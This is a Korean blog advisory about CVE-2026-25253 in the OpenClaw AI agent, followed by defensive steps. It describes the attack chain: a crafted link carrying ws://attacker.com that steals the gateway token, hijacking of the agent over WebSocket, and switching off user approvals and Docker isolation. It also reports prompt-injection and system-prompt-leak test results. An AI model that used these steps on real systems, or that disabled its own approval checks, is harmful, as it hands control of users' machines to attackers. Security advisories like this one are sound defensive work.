본문 바로가기
정보의기록

OpenClaw 사용자 긴급 경고! 치명적인 보안 취약점 발견

by Jeremy Winchester 2026. 2. 3.
반응형

안녕하세요, 여러분! 😊

요즘 AI 에이전트 열풍이 정말 대단하죠? 특히 OpenClaw(이전 ClawdBot, Moltbot)가 GitHub 스타 10만 개를 넘기며 엄청난 인기를 끌고 있는데요. 하지만 이 글을 읽으시는 분들이라면 반드시 알아야 할 치명적인 보안 문제가 발생했습니다. 😱

막 설치하려던 분이나, 이미 사용 중이신 분들 모두 꼭 이 글을 끝까지 읽어주세요!

📢 도대체 무슨 일이 일어난 걸까요?

2026년 2월 초, 보안 연구팀에서 OpenClaw에 CVSS 점수 8.8의 초고위험 보안 취약점을 발견했습니다. CVE-2026-25253로 등록된 이 취약점은 단순히 악성 링크를 한 번만 클릭해도 여러분의 컴퓨터 전체를 해커가 장악할 수 있는 무시무시한 문제인데요.

더 충격적인 사실은? 🔥

  • 보안 분석에서 100점 만점에 겨우 2점 획득
  • 프롬프트 인젝션 공격 성공률 91%
  • 데이터 추출률 84%
  • 시스템 프롬프트가 첫 시도에 완전 노출

"로컬에서만 실행하니까 안전하겠지?"라고 생각하셨다면 오산입니다! localhost로만 실행해도 이 공격은 여전히 유효하거든요. 😰

🎯 OpenClaw가 뭐길래 이렇게 위험한가요?

간단히 설명드리자면, OpenClaw는 로컬 컴퓨터에서 실행되는 AI 개인 비서예요. WhatsApp, Telegram, Discord 같은 메신저에서 명령을 내리면 다음과 같은 작업을 대신 수행해줍니다:

✅ 파일 관리 및 편집 ✅ 쉘 명령어 실행 ✅ 웹 검색 및 자동화 ✅ 여러 AI 모델 동시 사용 (Claude, GPT, Gemini) ✅ 캘린더, 스마트홈 기기 제어

강력한 만큼 여러분의 컴퓨터에 광범위한 권한을 가지고 있죠. 그래서 보안 문제가 발생하면 피해 규모가 엄청날 수밖에 없어요.

💀 CVE-2026-25253: 원클릭 RCE 공격의 무서운 진실

공격은 이렇게 진행됩니다

보안 연구원 Mav Levin이 공개한 공격 과정은 정말 소름끼칠 정도로 간단합니다:

1단계 - 미끼 던지기 🎣 공격자가 조작된 링크를 보냅니다. 예를 들면 http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080 이런 식이죠.

2단계 - 토큰 탈취 (단 몇 밀리초!) ⚡ 피해자가 링크를 클릭하는 순간, OpenClaw의 인증 토큰이 공격자 서버로 자동 전송됩니다. OpenClaw가 gatewayUrl 파라미터를 아무 검증 없이 신뢰하기 때문이에요.

3단계 - WebSocket 하이재킹 🕸️ 공격자는 훔친 토큰으로 피해자의 localhost OpenClaw에 연결합니다. 왜 가능하냐고요? OpenClaw 서버가 WebSocket의 origin 헤더를 검증하지 않기 때문이죠.

4단계 - 샌드박스 무력화 🔓 operator.admin과 operator.approvals 권한을 악용해서:

  • 사용자 승인 절차를 꺼버림 (exec.approvals.set → off)
  • Docker 컨테이너 격리를 해제 (tools.exec.host → gateway)

5단계 - 완전한 시스템 장악 💥 이제 공격자는 여러분의 컴퓨터에서 마음대로 명령을 실행할 수 있습니다. API 키, 비밀번호, 개인 파일... 모든 것이 위험에 노출되는 거죠.

실제 피해 사례는?

  • 2만 1천 개 이상의 OpenClaw 인스턴스가 인터넷에 공개 노출됨
  • 그 중 30%가 알리바바 클라우드 인프라에서 실행 중
  • 기본 포트 TCP/18789로 실행되는 많은 설치본이 충분히 보호되지 않은 상태
  • ClawHub에 악성 스킬 14개가 3일간 업로드되어 사용자 시스템에 악성코드 설치 시도

🛡️ 지금 당장 해야 할 5가지 보안 조치

OpenClaw를 사용 중이거나 설치를 고려 중이라면 즉시 다음 조치를 취하세요!

1️⃣ 최신 버전으로 업데이트 (최우선!)

npm install -g openclaw@latest
# 또는
pnpm add -g openclaw@latest

v2026.1.29 이상 버전으로 업데이트하세요. 이 버전에서 CVE-2026-25253이 패치되었습니다.

2️⃣ 게이트웨이 토큰 재생성

기존 인증 토큰은 이미 유출되었을 가능성이 있어요. 새로운 authToken을 생성하세요.

3️⃣ 연결된 API 키 모두 교체

OpenClaw에 연결했던 모든 서비스의 API 키를 즉시 교체하세요:

  • Claude API 키
  • OpenAI API 키
  • Google Gemini API 키
  • 기타 연동 서비스 인증 정보

4️⃣ 샌드박스 필수 활성화

OpenClaw의 샌드박스는 기본적으로 꺼져 있습니다! 😱 반드시 켜야 해요:

# OpenClaw 보안 문서 확인
openclaw security check

5️⃣ 로그 점검 및 모니터링

  • 인증 로그에서 의심스러운 WebSocket 연결 확인
  • 예상치 못한 토큰 사용 흔적 찾기
  • 비정상적인 명령 실행 기록 검토

🔍 전문가들의 경고: "절대 안심하면 안 됩니다"

테슬라 전 AI 디렉터 Andrej Karpathy의 평가

"OpenClaw는 최근 본 것 중 가장 놀라운 SF 같은 급성장이지만, 동시에 대규모 보안 악몽이다."

구글 클라우드 보안 부사장 Heather Adkins의 강력 경고

"OpenClaw를 실행해서는 안 된다. 외부에서 실시간으로 스킬을 내려받는 구조상, 서버가 해킹당하면 수만 대의 사용자 컴퓨터가 동시에 장악될 수 있다."

OpenClaw 창립자 Peter Steinberger의 인정

"프롬프트 인젝션은 여전히 업계 전반의 미해결 문제다. 강력한 모델을 사용하고 보안 모범 사례를 숙지하는 것이 중요하다."

📊 추가로 발견된 보안 문제들

CVE-2026-25253만이 문제가 아니에요. 연쇄적으로 터져나온 보안 이슈들을 살펴볼까요?

🎭 ClawHub 악성 스킬 유포 사건

  • 1월 27일~29일 사이 14개의 악성 스킬 업로드
  • 암호화폐 거래 도구로 위장한 악성코드
  • 사용자 시스템에 백도어 설치 시도

🤖 몰트북(Moltbook) 보안 우려

AI 에이전트만 활동하는 소셜 미디어 '몰트북'도 새로운 보안 위협으로 지적받고 있어요. 에이전트들이 사용자 데이터를 공유하고, 심지어 "AI 반란"을 논의하는 등 예측 불가능한 행동을 보이고 있죠.

📉 ZeroLeaks 보안 분석 결과

독립 개발자 Lucas Valbuena의 테스트 결과:

  • 전체 보안 점수: 2/100점
  • 시스템 프롬프트 완전 노출
  • 내부 도구 구성 및 메모리 파일 접근 가능
  • 평문으로 저장된 자격증명 발견

💡 안전하게 AI 에이전트 사용하는 법

그렇다고 AI 에이전트를 완전히 포기할 순 없잖아요? 안전하게 사용하는 방법을 알려드릴게요! 😊

✅ 실천 가능한 보안 팁

1. 격리된 환경에서 실행하세요

  • 개발용 노트북 대신 별도 컴퓨터나 VM 사용
  • 중요한 데이터가 없는 환경에서만 실행
  • 24시간 돌릴 전용 서버 마련 (중고 맥미니 등)

2. 최소 권한 원칙 적용

  • 꼭 필요한 권한만 부여하세요
  • 파일 접근 범위를 최소화
  • 실험용 계정으로 먼저 테스트

3. Tailnet 같은 VPN으로 네트워크 격리

  • 공용 네트워크에 relay 포트 노출 금지
  • Tailscale 등으로 안전한 터널 구성
  • localhost 바인딩만으로는 부족해요!

4. 정기적인 보안 점검

# 정기적으로 실행하세요
openclaw health
openclaw gateway status

5. 의심스러운 스킬은 절대 설치 금지

  • ClawHub에서 스킬 다운로드 전 리뷰 확인
  • 소스 코드 검토 (가능한 경우)
  • 공식 또는 검증된 개발자의 스킬만 사용

🤔 그럼 OpenClaw를 아예 쓰지 말아야 할까요?

이건 정말 어려운 질문이에요. OpenClaw는 분명 혁신적이고 강력한 도구예요. 하지만 현재로서는 보안이 충분히 성숙하지 않은 것도 사실입니다.

사용을 고려해볼 수 있는 경우

  • 보안 지식이 충분한 개발자
  • 격리된 테스트 환경에서만 사용
  • 중요한 데이터를 다루지 않는 업무
  • 최신 버전을 항상 유지할 수 있는 환경

사용을 피해야 하는 경우

  • 회사 업무용 컴퓨터
  • 개인정보나 금융 정보가 있는 시스템
  • 보안 설정에 자신이 없는 경우
  • 24시간 모니터링이 불가능한 환경

🔮 AI 에이전트 시대의 보안, 어디로 가야 할까?

OpenClaw 사태는 AI 에이전트 시대의 보안 과제를 적나라하게 보여줍니다. 편리함과 보안 사이의 균형을 어떻게 맞출 것인가가 앞으로의 핵심 과제가 될 거예요.

업계가 해결해야 할 과제

  1. 프롬프트 인젝션 방어 표준 확립
  2. 제로 트러스트 아키텍처 도입
  3. 스킬 마켓플레이스 보안 검증 체계
  4. 샌드박스 기본 활성화
  5. 정기적인 보안 감사 의무화

 

📌 참고 자료

  • OpenClaw 공식 보안 권고문
  • CVE-2026-25253 상세 분석 (NVD, DepthFirst)
  • The Hacker News 보안 리포트
  • 국내외 IT 보안 뉴스
반응형